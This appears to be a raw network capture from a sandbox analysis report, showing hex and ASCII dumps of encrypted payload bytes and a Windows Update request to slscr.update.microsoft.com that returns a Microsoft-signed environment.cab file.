                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: 7f 8b 1a 77 b8 ac c9 fb 13 ea f6 79 df 03 30 04 51 6e 44 e7 f9 44 73 c6 16 6b 55 ae f2 8e a9 3b 24 59 97 87 28 90 76 fc 8b 04 8c cd b7 e7 31 e1 ec 82 ae ac fd 56 69 e9 49 3f fb 5d a0 44 a0 96 30 b5 9c 06 a8 73 d7 83 4b b8 0b 26 3b 7b e6 ea 07 f6 3c 24 3f 5d 32 f2 13 a7 a8 39 1a 55 ac 90 e8 e6 e4 c1 d4 aa ac 6c 68 8b 06 db d9 e4 36 6c 34 7c c5 19 e2 52 c6 72 d9 c3 59 00 57 f8 35 60 5b 69 1d 59 92 ac 03 43 1f 29 0f fe bc 39 e5 87 13 07 bc 92 37 b8 8c fe 01 d2 d5 f2 c4 c5 5c cc ec 92 e3 dd d5 f0 73 9c 63 a9 7a ce 70 b8 26 2b 0e a1 13 d3 50 97 cf 84 78 0c 2a 8c 64 78 09 a2 ea 03 d9 11 d9 8d c3 c4 e4 a5 bf 65 5a b9 0e 31 80 d6 71 3f e1 09 9c 5a 10 d1 73 a8 77 d1 9a 75 4c b7 f3 fa 45 7b 64 60 2a 4f ba 83 70 f9 a1 1a de 2f d4 ff 5d 68 a9 90 5a a9 5b f2 56 fd 27
                                                                                                                                                                                          Data Ascii: wy0QnDDskU;$Y(v1ViI?]D0sK&;{<$?]29Ulh6l4|RrYW5`[iYC)97\sczp&+Px*dxeZ1q?ZswuLE{d`*Op/]hZ[V'
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: b3 3f f8 fa 43 f4 5b 7c aa 57 a1 28 69 99 e1 91 fc 8a 37 41 b6 a3 a4 32 d1 13 a7 72 ed 59 93 4b 39 a1 e9 2d b4 fb 1a 6c 57 8c 76 7b b6 0d 41 d0 33 3e 79 8d 59 ac 73 68 ba 9a 50 39 c9 a8 b9 e5 8f ac e6 10 a5 f9 d1 37 e1 07 ce b3 0f 6d 87 7c 73 11 34 cc 73 87 ab e0 c4 98 5e 5a 8d f8 3a 19 8d ab bc 3f 6f 9f 2f 04 d8 de 33 70 35 82 6c 95 11 40 94 41 74 f3 ed 72 d0 0a 5d 1f ac 34 69 d6 2e 61 84 76 ec d6 90 eb 98 a0 49 60 9f bc 3c af e7 e5 f1 6b 40 d1 a9 a8 38 d7 30 74 fb bb 26 1b bd 25 d0 93 f9 41 fb 71 7a 80 4d 34 f3 df de f7 04 cd 70 b0 f4 5a 9e 64 5e de 92 30 b6 be de 08 02 19 8a bb b0 d8 fb 65 28 64 fe d4 7e a1 cf 02 64 0a b2 35 f0 6f 1d d0 2a 4a 7f 71 3c f1 4f e8 9d ea 26 92 72 77 cf f9 7e 87 f0 68 1d 04 12 90 e9 af 60 a1 56 2b 54 db d2 0f 43 09 e8 73 82
                                                                                                                                                                                          Data Ascii: ?C[|W(i7A2rYK9-lWv{A3>yYshP97m|s4s^Z:?o/3p5l@Atr]4i.avI`<k@80t&%AqzM4pZd^0e(d~d5o*Jq<O&rw~h`V+TCs
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: 65 2f f0 28 f8 9e 11 ec 75 4a 53 dc b0 46 b7 9b e5 94 c4 c8 06 56 9e be 09 9d ec ba 80 39 c5 f4 03 69 3a 7c 56 41 16 ab 45 43 a3 e4 82 af 00 a2 6b 9c f5 9a 69 d2 8a 0d 61 1c de ed 71 25 b3 23 fb 15 e7 24 bc 9a 7a 34 ea c2 f2 a3 de 86 a6 17 81 a2 f4 35 a1 7c 97 83 38 f9 70 5f 46 e8 e4 d9 9d 9c b5 7a ef fc de b0 42 60 d3 80 32 c8 4c 4c 8a a5 87 fe 36 4d 77 cc 7a 50 a3 9f 12 4b 30 c6 b9 8a 64 f9 15 53 1b f1 99 62 f4 0f 90 53 f9 30 67 c9 8b 9c 71 0a 51 97 64 87 87 e0 ee 97 3b bb 3c b1 91 02 82 4d 13 2a 2f 86 34 4d c2 a7 88 c4 1e e4 a5 14 d8 86 2c 45 9d eb 99 59 2b 1a dd fe 1b 3e b6 35 72 c9 26 69 1d c0 81 81 76 9b 8d 24 29 79 4a ea 80 68 07 4a 10 88 d5 24 da 68 ba 29 9a 3d 08 04 36 a4 85 da 6b ff 62 93 6f b3 c8 8d 34 68 fb 11 60 5a 15 d8 1b e6 26 a9 d3 ac c3
                                                                                                                                                                                          Data Ascii: e/(uJSFV9i:|VAECkiaq%#$z45|8p_FzB`2LL6MwzPK0dSbS0gqQd;<M*/4M,EY+>5r&iv$)yJhJ$h)=6kbo4h`Z&
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: 2a da 2f e4 f7 78 16 c9 a1 ee 94 52 01 a1 69 46 80 2f ed a4 da 07 b1 c2 1d 44 13 d6 a9 c2 b2 f2 9b 22 a2 2d 96 36 97 92 50 f8 1d 00 44 28 26 fd 06 14 7f 1a 8f f4 b7 4c 8d d2 4e de f9 4d 9c 0f 93 d9 bc 29 7e 54 3a 7f 73 e7 84 93 a6 4e bd 85 e5 96 df c2 a7 db bb 6c ce 99 3e 5d 39 e5 47 15 49 07 4b 13 0a b3 40 2e ff d8 17 0d 20 da 12 a8 97 a6 e4 e5 c6 ac 2f 6f c4 b2 33 1c 13 d7 50 3a fb 06 12 1b d4 c2 d1 68 8e c4 d3 4f 98 8e cb b3 04 bd db df b9 69 89 5b 2f e8 18 ed ac 4d f1 29 03 6f 85 7d b7 8b 06 a1 66 9f eb 67 7f 2d ce 62 03 a0 fb 93 51 d6 03 3c 16 b7 9d 88 23 61 11 ad 2c 2c 96 cd d7 41 a5 5b 65 f0 38 1d 9e 0b ee 97 12 17 5c fa d4 1f 61 68 8b 1b 5b e7 f7 45 b8 e4 22 44 1d 50 c0 ba 20 ea 86 7d 79 9d f9 64 fa 2a b9 b4 15 6f 31 32 3c 5c 36 98 41 7d 01 3b f8
                                                                                                                                                                                          Data Ascii: */xRiF/D"-6PD(&LNM)~T:sNl>]9GIK@. /o3P:hOi[/M)o}fg-bQ<#a,,A[e8\ah[E"DP }yd*o12<\6A};
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: a8 80 5e f8 95 0c 4b b5 68 f7 35 2b 0f c8 7e ec 1d 69 da 72 33 46 43 ea b8 58 c2 d2 b2 50 f9 1a f5 9b 32 cc 30 98 f4 4f 17 d9 f9 ab e6 be 94 b0 87 9a 82 c1 54 7b 4a 79 45 56 7f b5 71 94 a1 f4 d3 84 55 62 66 e8 5e ea fb 1f 92 2c 49 87 68 45 be 15 63 d4 0e 52 45 b1 09 c3 f1 0c 55 2f 76 ee 68 23 8f 3a 44 21 7a 94 2b 84 19 3c 9b 32 8f bb a0 97 39 f2 1f 35 67 75 da 9f 6b 16 80 c2 6c de 9f b9 31 2b ff 5a 02 2d 6e 35 ef 21 5c 25 e2 7e a8 5d 51 c5 6e 3a 6e 82 6a 4d 11 2d de 18 fd b4 95 3e 99 54 42 13 f6 77 b8 5c e5 19 6a a0 ed b2 64 86 f7 35 d5 87 d3 f6 56 c5 7e 65 d3 cf 90 86 52 66 b3 c2 ed be 0c 40 ac d9 8a aa fe fb 03 97 de 9a cf 4b c9 5d 9e 43 94 4d e4 b2 06 6c 4d ef f3 08 7c de 7b 6b 82 ac 88 4f cb 9d 73 ff fa 21 5b 9a 9b a7 ab 68 b4 9d c0 78 e8 68 59 6a 7d
                                                                                                                                                                                          Data Ascii: ^Kh5+~ir3FCXP20OT{JyEVqUbf^,IhEcREU/vh#:D!z+<295gukl1+Z-n5!\%~]Qn:njM->TBw\jd5V~eRf@K]CMlM|{kOs![hxhYj}
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: f1 26 b4 84 9e b8 0a 4e 89 3b 1b 58 2a 8b 62 97 34 b8 f9 a7 d8 e1 78 bf e2 e2 60 8c 77 c8 b8 e6 2c 8b ef 9a c2 ed 4e 53 04 66 36 8d c8 47 36 7a 9e 1a b1 e5 ad cf 95 31 c8 5e 1e 38 6f 25 e5 65 a0 40 94 22 dd c7 9d 4b 37 93 1e 7d 8b 1b 64 e4 02 a3 83 35 b3 83 79 99 df f5 ec 99 7e e5 8f c2 a2 e4 34 f7 44 71 46 fc a3 4e 0e d0 68 5f 8b 4e 81 83 37 87 e6 00 7d d4 09 74 a7 61 dd d0 83 a6 4d 76 14 c8 c9 45 50 75 a0 07 a6 cc 16 d1 12 57 2e c8 0a 30 28 99 1f a4 b6 d9 8b 8d 83 92 40 3e 95 f0 41 04 be b0 45 0e 4f b9 9e 13 a3 28 d8 dd 34 04 9d 18 3b 03 4a 58 f6 97 9d ce 5b 50 3b 59 7c 37 51 2a 1d 27 a1 c7 47 1e 2c e8 07 2a 5b 54 5a ce 02 b2 4d 2f 1f 61 d4 51 37 11 a8 39 34 05 87 7f c6 c4 c8 d4 b9 92 6f 7b c0 f4 ec f6 aa bc 85 73 7b a9 5f 18 9e ad 5b 25 10 a8 72 88 a6
                                                                                                                                                                                          Data Ascii: &N;X*b4x`w,NSf6G6z1^8o%e@"K7}d5y~4DqFNh_N7}taMvEPuW.0(@>AEO(4;JX[P;Y|7Q*'G,*[TZM/aQ794o{s{_[%r
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: 03 48 d3 8d dd 55 75 bf 6e 6d 45 1c 86 4f 01 1e 2b 9c 3a 11 d1 24 4d 66 1d 4e 87 46 a1 3a 4a f9 5c d1 8f 49 d1 1f 4b 62 4f e4 a9 d8 3c 13 c7 9e df 0e fe ce 42 6e 98 12 d3 cd 49 ba 80 b1 9a 29 c5 93 aa e7 4d 13 ed 6d 54 73 fd 89 d9 5d 60 c0 d8 e9 cd d9 bc 19 ac 31 f0 65 91 a1 ec 08 63 d3 dd e7 2d cf 19 32 5e 2c 04 f1 59 37 38 28 68 50 8d c0 d8 d7 b8 e5 1f 54 1b c6 f4 ad bf ba 86 38 4c 58 e9 83 5b dd 3c d3 e8 89 7c 4f 8d 68 2c 85 d9 f7 e3 0a a7 f5 aa 6d ef c7 e0 4c 0d 2e b8 29 ff be b5 c9 3a 74 04 38 2d d3 e7 b9 82 20 c3 65 40 3e 2a 5b 91 28 a3 0f 86 99 c0 d6 b9 78 23 16 31 a9 cc 1d 58 51 c7 c8 fc b8 16 53 d1 f9 b4 25 fa 4f d9 ef 3e 8c a2 0d c9 70 e3 29 cb 09 6e 49 71 df a6 fa 20 d0 eb e9 d5 a9 c8 ea 2e be 59 62 b2 ab 0b b1 f9 96 10 1d 81 4f 76 96 2a f3 43
                                                                                                                                                                                          Data Ascii: HUunmEO+:$MfNF:J\IKbO<BnI)MmTs]`1ec-2^,Y78(hPT8LX[<|Oh,mL.):t8- e@>*[(x#1XQS%O>p)nIq .YbOv*C
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: 25 4b f0 d7 dd db ed e9 ce 35 17 40 2d a0 46 da 34 2f 03 7b 09 c6 fc 9b 27 e0 d8 88 77 a1 23 37 3f 4f c5 9f e0 69 a3 2a b9 28 29 84 7e 88 b5 78 48 85 63 08 65 28 08 b3 e3 15 e6 de 4c 6f dd 57 15 8d 63 7d cf f3 b0 c5 92 2f 55 d2 c1 5f df 0f 06 00 4b 03 45 72 a8 81 67 2a 8d af 30 45 f0 f6 99 41 0a 25 c8 34 fb 2a db dd e9 d9 ba 63 fa 19 13 a0 66 32 69 27 77 10 3a 27 3b d3 34 7f f8 45 81 e7 54 fe 2e ef f4 53 0a a6 f9 76 0b 6d 37 9b b2 96 4b b8 ea 7e 6c 4c 0c 1b 7a 5b 88 a3 5c 31 a5 cc ca fc b9 e6 a3 0c 6b 90 59 ea 93 13 81 c4 f1 44 72 f3 59 da 13 ce e7 04 3e cb 54 91 71 50 15 58 5b 8c 09 b2 23 34 dc cb d6 9a 6c ba 5e 2f 44 12 86 05 07 69 a7 ea 61 cd b1 65 f5 12 85 e0 3f f0 fc 62 5f 69 f5 89 72 26 f7 70 bc c5 89 12 54 77 a4 3e 25 ee 07 ed b4 e6 15 87 67 14 06
                                                                                                                                                                                          Data Ascii: %K5@-F4/{'w#7?Oi*()~xHce(LoWc}/U_KErg*0EA%4*cf2i'w:';4ET.Svm7K~lLz[\1kYDrY>TqPX[#4l^/Diae?b_ir&pTw>%g
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: 15 5e 78 c4 89 96 b6 70 ce 92 32 cb 3e 4c 57 ec f4 c8 93 f9 ad cc 6b ff 4b 77 5a c3 e6 b5 4e bc ef c2 cd f9 29 53 e7 f1 99 b7 b0 3d 91 a6 83 69 d4 ff b8 9a 22 78 9b 06 e4 64 a8 96 6f 74 c9 d0 d8 91 60 30 bd 4e b1 25 66 99 09 95 8d 75 57 5e f2 91 e6 5c d1 d9 b2 5e c1 05 66 b8 8a 8b 0d 0c 91 c2 4f fa 90 6d 9e 97 b4 8c 4e a4 15 c5 4f 66 72 52 74 c8 f4 c5 6e 9f e2 94 cc e6 11 12 98 fb c4 11 97 be 13 17 84 bb 1f f6 6c 82 2e 6a 2f 6f 49 d4 91 52 52 2b b6 85 fa f8 72 f4 ae ea d3 25 0e d9 c8 4e 54 61 ac bc 5a 60 4d 4c df 30 de 5d b6 83 16 ca 1b 21 aa d5 78 cc bd cd 40 d3 08 09 7f 35 8a 11 74 c2 b5 3e 75 ab a6 60 46 cb df df 6c 12 37 04 5e 79 4a fc 75 03 45 d9 39 a9 12 60 99 5f cf b3 69 6d fa 19 35 5d bf 73 05 1c da ed 32 07 31 4b b0 65 53 e7 30 53 a8 72 25 db b7
                                                                                                                                                                                          Data Ascii: ^xp2>LWkKwZN)S=i"xdot`0N%fuW^\^fOmNOfrRtnl.j/oIRR+r%NTaZ`ML0]!x@5t>u`Fl7^yJuE9`_im5]s21KeS0Sr%


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.44972152.149.20.212443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-05-14 02:31:38 UTC309OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyuNTUbx63B6wMY&MD=cMd2RACN HTTP/1.1
                                                                                                                                                                                          host: slscr.update.microsoft.com
                                                                                                                                                                                          accept: */*
                                                                                                                                                                                          user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          2025-05-14 02:31:38 UTC541INHTTP/1.1 200 OK
                                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: application/octet-stream
                                                                                                                                                                                          expires: -1
                                                                                                                                                                                          last-modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                          etag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                          ms-correlationid: 7448248c-4f95-4526-9fdf-d4a202805d38
                                                                                                                                                                                          ms-requestid: d0e04b96-a096-4c20-ab73-40a4d2e20714
                                                                                                                                                                                          ms-cv: XU7g4eLq10iDN9XR.0
                                                                                                                                                                                          x-microsoft-slsclientcache: 2880
                                                                                                                                                                                          content-disposition: attachment; filename=environment.cab
                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                          date: Wed, 14 May 2025 02:31:37 GMT
                                                                                                                                                                                          content-length: 24490
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: c7 c3 8f 06 b6 24 05 3c f9 2c cb e0 99 86 1a f8 03 ca b3 04 d8 16 f0 f9 32 7f 28 14 e1 08 d8 03 b6 5f ca 00 2c ca e8 4f 1f 06 4e 31 f0 2f 3c 0e 0b 50 12 26 c4 00 85 7e 42 c0 00 c8 0f fa 0d c7 c3 a0 90 23 e5 21 63 33 1e a7 e6 2a f9 c3 ee 4b 69 ce 94 9b 68 c7 7b df ba c7 eb c3 55 b3 50 05 c8 b4 a7 ea a2 5e 5e cd 3a a2 aa 75 43 4b 97 f4 bd 25 ec 55 81 8f 48 6a d4 2b fb 61 52 86 d0 3b 01 14 b0 69 f4 31 7a b6 35 59 f1 51 9b 07 06 22 e9 3b 54 1f 1c 09 53 6c 08 99 9d 74 59 32 ad 33 42 5a f5 2c 05 bf b7 e9 cf 8f 5d 2c 89 c9 8a 5f 6c 65 4c 0c 6d 6a 3f 83 6c b8 bf a3 10 39 92 ad fd bc d8 94 f7 ca 6b ef 90 4b eb 87 76 34 1d 50 f6 0b 7d 4a 62 19 4b 92 ae d4 3f 79 3c 37 e1 2d 6c bc f7 fc 95 94 bd 9c f5 56 86 da 39 b9 b3 67 4c 1a 17 d4 27 59 97 fa bb 03 e7 1b 32 9c 5f
                                                                                                                                                                                          Data Ascii: $<,2(_,ON1/<P&~B#!c3*Kih{UP^^:uCK%UHj+aR;i1z5YQ";TSltY23BZ,],_leLmj?l9kKv4P}JbK?y<7-lV9gL'Y2_
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 99 5f f0 57 d3 49 7b b2 e4 e5 c0 9e f2 e2 b5 17 92 26 2b c1 a3 c2 60 60 5d 36 2c de 60 61 ea e8 98 df 55 7a a8 91 e4 a9 84 e0 3b 6e 95 89 91 fc a7 0f 95 af 35 36 d1 a7 99 9e 88 5e 1c 90 6f 76 55 35 c9 a6 7b 9c 57 31 1c 7d 98 8c a5 d0 5c 66 01 23 08 79 a0 ac fd 28 e3 66 c4 5d bc 06 ed c2 ac 2e 85 85 1d 2c f9 63 f9 ae 62 0a e0 dc fd 65 e4 07 da 27 83 27 db 54 2f 30 4f ab 57 35 d0 e3 25 bc 3a 8a 0f 18 ab 06 65 1d c3 c6 d7 dc 20 e5 92 42 df 59 3a dd 99 b4 1e 33 04 f5 9c 31 69 0f ec 13 9b b8 7c 93 51 3a 5b 90 33 78 d9 c2 f9 a0 e5 54 1d b7 41 12 7c ea 48 f9 8b 32 9d cb 22 59 19 02 65 dd 61 fc 1e b6 2d 6d 85 1b 49 c9 9e 9d a6 e3 15 82 bd e8 4e 07 0a 96 41 09 6c 7a 91 fe 23 c6 ec 81 c3 34 b3 bc bd 6d 1b a2 f9 9d 9a 55 ad 27 0b b3 da 0d 82 7c 98 8d 2d 3b d6 c6 13
                                                                                                                                                                                          Data Ascii: _WI{&+``]6,`aUz;n56^ovU5{W1}\f#y(f].,cbe''T/0OW5%:e BY:31i|Q:[3xTA|H2"Yea-mINAlz#4mU'|-;
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 2d 5f d0 00 d0 07 f4 72 f6 e6 e8 44 69 fd 25 5f 10 dc 3f 70 f7 40 41 25 f8 69 80 38 20 27 0e a0 36 fd 40 ab 6d 7e e0 7e 60 1f a0 bb cd 0f 54 fd d7 fc c0 df e9 fb c7 c8 07 c3 96 47 48 09 90 7f f5 08 49 7f e5 05 82 72 c3 a4 de 98 91 55 c3 ea 10 ce a3 13 c3 f7 12 97 f6 c4 ce d7 c2 d9 28 f3 83 ce ec 99 14 4b d4 be 03 9e 48 26 e8 06 e4 1c e3 a4 41 09 dd e2 d3 84 db 86 e8 d2 f6 fb 0d f2 bb 63 cb fd 6b 48 cc 83 a9 85 16 0a 62 17 34 a2 dc b2 5c 8e 5a 11 11 25 46 bc 99 aa 15 3b c9 46 0f 5f 5e b9 9a fd a8 03 36 50 d9 0b 10 d7 86 2a ed 8c d3 6e 1f ed e9 f0 96 84 f7 3b dc 1d 9e 09 6e c5 df da 17 74 23 13 af d2 ac 85 dd 4d 74 ea 15 fd 52 cf 64 7f b7 fa f3 19 03 d1 3c 1d f9 9e 49 c6 ae 97 08 66 b1 ba 94 91 c7 2a c7 ee c7 ef 55 45 e4 5e a7 ed 2e 5d 46 59 44 0d 4b 8d 93
                                                                                                                                                                                          Data Ascii: -_rDi%_?p@A%i8 '6@m~~`TGHIrU(KH&AckHb4\Z%F;F_^6P*n;nt#MtRd<If*UE^.]FYDK
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: f4 d2 5b 0d c4 46 f4 08 0d 64 b7 dd 0e 23 c4 4a be c6 2c 08 e4 15 96 43 0e 90 12 6e 83 93 e4 22 73 bf 9c 43 a3 72 7e 18 32 1c 87 83 10 55 1d 3d 13 70 78 a0 df ea 3e bc 8f 9c f3 c9 cd b2 63 9f 56 68 27 2f ce f2 f7 d1 be 1e 37 ef db 07 4d 38 19 d3 72 07 4b 21 bd e4 5a 22 2f df 9c d9 42 cd 28 ce 46 7d 02 5e c0 3a 7d 59 8f ba 2b d9 8a 6a ee ee 00 2f 1d b9 28 fd 40 78 e3 bc e0 27 36 dd fd 43 d9 6a 3e 0d 73 ca 91 ee 0f 3d a6 1a b5 25 8c d1 15 8a d7 f8 93 2e 54 ac df 56 e1 7f ed 19 54 17 27 34 90 14 e3 70 8c 6c 7f ff 7e 4f 51 14 1e 4e 05 72 47 b2 4d 89 4e f9 67 77 f4 77 a9 eb f6 50 12 1e aa 0b b0 6d 8f 25 51 7d 17 52 f8 55 b8 68 f5 90 ab 07 5f 36 1f f1 e4 1e e5 fb f3 73 97 9a e6 1d ab bb ee b9 59 5a f2 3c e8 6d 9f be 51 7b 02 c0 7d d8 d6 01 4c 12 85 7b 05 e0 5e
                                                                                                                                                                                          Data Ascii: [Fd#J,Cn"sCr~2U=px>cVh'/7M8rK!Z"/B(F}^:}Y+j/(@x'6Cj>s=%.TVT'4pl~OQNrGMNgwwPm%Q}RUh_6sYZ<mQ{}L{^
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 17 7a 50 e3 3d 37 50 78 c6 9b 00 9e b1 6c 93 1f 64 fc 47 28 e5 6f 7b 2c 3f 66 9c 1b c0 91 91 7f f1 eb 59 11 28 38 61 06 ff bf 92 d0 14 5f 4d 0f e8 d9 e9 00 5a 30 6e 48 2f 23 03 13 4d 57 f0 f8 e5 8d 51 9b 88 0d f9 1d 57 58 98 cf e8 0b 8c f6 eb 9c da ff e4 4a 13 15 29 0c 69 75 94 79 e3 95 50 e5 48 e0 90 99 54 fe c5 90 26 13 97 27 85 89 ed 99 b4 32 69 b3 23 07 e3 9e fb e7 e2 e9 27 ff d9 3c 6e 78 48 c3 3d 4c b0 78 83 47 97 43 99 4b fa 65 6a 2b a5 20 16 23 d3 dd e2 46 1d 6b 79 16 e2 7b e7 3e e7 71 eb 7f c8 e3 4a 49 a0 64 7e e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 ff ab f3 b8 5d a3 0e 92 5e 1d d9 33 07 9d b4 5a 5b 1f 36 94 07 fb 31 44 46 72 24 1d af 77 ba 94 e6 6b df 96
                                                                                                                                                                                          Data Ascii: zP=7PxldG(o{,?fY(8a_MZ0nH/#MWQWXJ)iuyPHT&'2i#'<nxH=LxGCKej+ #Fky{>qJId~qqqqqqqqqqqqqqq]^3Z[61DFr$wk
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 72 61 74 69 6f 6e 73 20 50 75 65 72 74 6f 20 52 69 63 6f 31 16 30 14 06 03 55 04 05 13 0d 32 33 30 38 32 39 2b 34 35 34 32 33 37 30 1f 06 03 55 1d 23 04 18 30 16 80 14 ad 94 76 8f 83 ad 0e 03 a3 e8 3b b0 d7 34 68 d4 79 3a 7d dc 30 60 06 03 55 1d 1f 04 59 30 57 30 55 a0 53 a0 51 86 4f 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 72 6c 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 70 64 61 74 65 25 32 30 53 69 67 6e 69 6e 67 25 32 30 43 41 25 32 30 32 2e 31 2e 63 72 6c 30 6d 06 08 2b 06 01 05 05 07 01 01 04 61 30 5f 30 5d 06 08 2b 06 01 05 05 07 30 02 86 51 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 65 72 74 73 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55
                                                                                                                                                                                          Data Ascii: rations Puerto Rico10U230829+4542370U#0v;4hy:}0`UY0W0USQOhttp://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl0m+a0_0]+0Qhttp://www.microsoft.com/pkiops/certs/Microsoft%20U
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 6c d5 21 c9 b8 50 68 05 c3 e4 09 c9 bd 51 c9 5f 6d 75 4f 8d 35 30 c5 8c c1 83 b2 1f 93 b5 72 6f d2 44 90 1d ed 7f 13 a9 7d 53 24 9c aa 46 c0 8f c5 c5 be bf c8 55 14 fe 87 35 fe cd d5 7e 02 d2 87 68 00 c9 b8 d7 44 cb 71 db a4 8b b3 e0 0e a6 0b ce 12 7d f6 68 dc c0 91 31 f8 59 2c 2c f5 d5 d1 2e 08 9d 2b 30 6a 6e aa ad 9e 16 4e 27 d0 ba 3b 1a 81 30 43 38 92 87 e1 6c 6f 43 3d 2d 4e 1f 0d 10 c1 f8 fa bc 84 c8 93 c3 9e 47 fc b6 fa d1 2f b6 af 39 3e 9c 3f 1c f1 4d a4 16 d3 0a e2 e7 4e f5 37 88 03 46 8e 1e cc 77 c1 47 d3 44 b7 e4 35 23 db eb 20 cb 2a f5 57 ae 2e 00 3b 6b e6 a3 6e 05 99 70 bb 76 3b d8 3c b4 76 f6 28 15 3a 25 d4 26 a4 08 9f d9 7e 7b 44 8a b7 15 8a c6 c5 78 2a 9d 32 c4 83 7b b9 6e 42 14 99 5d 49 7f 45 99 57 a7 33 77 44 1a ff 47 a3 71 b7 b0 b1 56 8a
                                                                                                                                                                                          Data Ascii: l!PhQ_muO50roD}S$FU5~hDq}h1Y,,.+0jnN';0C8loC=-NG/9>?MN7FwGD5# *W.;knpv;<v(:%&~{Dx*2{nB]IEW3wDGqV
                                                                                                                                                                                          2025-05-14 02:31:38 UTC1460INData Raw: 42 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 34 30 32 a0 14 80 12 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 a1 1a 80 18 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 01 00 3d cd 0e 0a 7b 43 82 69 14 76 9b c2 1b 25 6c 3f 01 d0 b8 bb 6f e9 4d 62 55 f3 7a 5b c4 05 04 2e 09 48 41 fd e9 13 24 1e f0 71 f0 79 9e 8e a7 ea d7 72 49 9f 71 e8 41 4c 0a 8e 69 71 3c 8f e9 56 c5 9d a0 e6 3c df 48 88 1c cf 7f eb a0 34 f3 ff 37 ca 6d 9f c7 86 eb 12 35 0a 45 a5 81 a8 f8 53 6d c6 11 4e ef 37 77 2a 73 bf 08 f9 ee ba 8d b8 48 1a 93 32 44 3a cd 7c 41 2d e3 20 7e 34 a2 7c 2b 93 92 2f 0a 5f 17 c8 65 98 79 74 bb e7 1c 1a e2 6c a4 15 db cf ae 5b 18 f9 9a 82 ab 98 f5 13 93 f3 0f 89 71 a4 2f c0 7e
                                                                                                                                                                                          Data Ascii: B+71402Microsofthttp://www.microsoft.com0*H={Civ%l?oMbUz[.HA$qyrIqALiq<V<H47m5ESmN7w*sH2D:|A- ~4|+/_eytl[q/~
